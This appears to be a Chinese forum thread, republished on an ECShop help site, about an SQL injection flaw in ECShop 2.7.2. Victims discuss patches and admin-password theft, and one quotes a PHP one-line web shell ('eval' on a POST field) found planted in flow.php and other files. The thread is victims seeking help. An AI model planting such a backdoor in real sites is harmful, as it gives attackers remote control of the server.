ECSHOP 2.72最新SQL注入漏洞好像还没有解决吧

2016-07-07 15:26 来源:www.chinab4c.com 作者:ecshop专家

ECShop 2.7.2 最新任意用户登陆漏洞0day

2.7.2 最新任意用户登录漏洞代码


ECSHOP 2.72最新SQL注入漏洞原帖:http://bbs.mmbest.com/viewthread.php?tid=155432

回答:
补丁
http://bbs.ecshop.com/thread-127611-1-1.html

那个帖子是ECShop V2.7.2 UTF8_Release0505

ECShop网店系统 V2.7.2 Release 0604正式版发布
建议使用最新版本~



flow.php这个是破后台密码,并不能植入文件。

那个帖子是ECShop V2.7.2 UTF8_Release0505

ECShop网店系统 V2.7.2 Release 0604正式版发布
建议使用最 ...
晓天 发表于 2010-6-12 16:35




我是用的ECShop网店系统 V2.7.2 Release 0604
这个版本

怎么不让知道后台密码?

这个sql 是弄 管理员密码,密码是经过md5加密的,所以只要密码够复杂,那么对方即使拿到了也破不了。

2.7220100604版本的代码怎么和别人发现漏洞的代码还是一样呢

这个sql 是弄 管理员密码,密码是经过md5加密的,所以只要密码够复杂,那么对方即使拿到了也破不了。
晓天 发表于 2010-6-12 17:18



还是不行,密码那么复杂还是不行
没几分钟又进来了
还是flow被修改,

那么文件校验,查看什么文件被修改过了。还有清除换,查看image文件夹的各个文件,里面是否有特殊的php或js文件。那些可能是木马源文件。

连空间的image文件都可以删除啊
太夸张了,不是只有管理员后台密码就可以做到的吧 截图1276337759.jpg



flow.php auction.php 还有一个ecs.php都有这个代码 <?php eval($_POST[cmd]);?>


还有这个代码,是后门么?

最近我的ecshop2.72 0505的版本也不消停,吃不消啊! 有些人拿着后台向你炫耀。


被挂木马了

明白了,明白了,可还是不明白